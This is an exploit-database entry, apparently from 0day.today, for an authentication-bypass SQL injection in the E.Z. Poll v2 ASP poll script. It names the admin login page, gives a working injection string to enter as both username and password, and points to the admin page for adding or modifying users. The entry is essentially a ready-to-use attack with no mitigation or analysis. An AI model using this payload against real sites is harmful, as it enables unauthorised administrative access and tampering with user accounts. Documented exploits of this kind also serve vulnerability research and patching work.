id: 4329
date: 12/01/2008
title: E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
author: t0fx
cves: 

==============================================================
E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
==============================================================


Description:
************* ***************** ************* *******************
E.Z. Poll <= v.2 script Remote SQL injection Exploit
discovered by t0fx aka xtof69
vendor : E.Z.


************* ***************** ************* *******************

vulnerable page : http://www.site.com/admin/login.asp

exploit :

Username : 'or' '='
Password : 'or' '='

Add, modify user :
/admin/admin-users.asp 



#  0day.today [2023-03-25]  #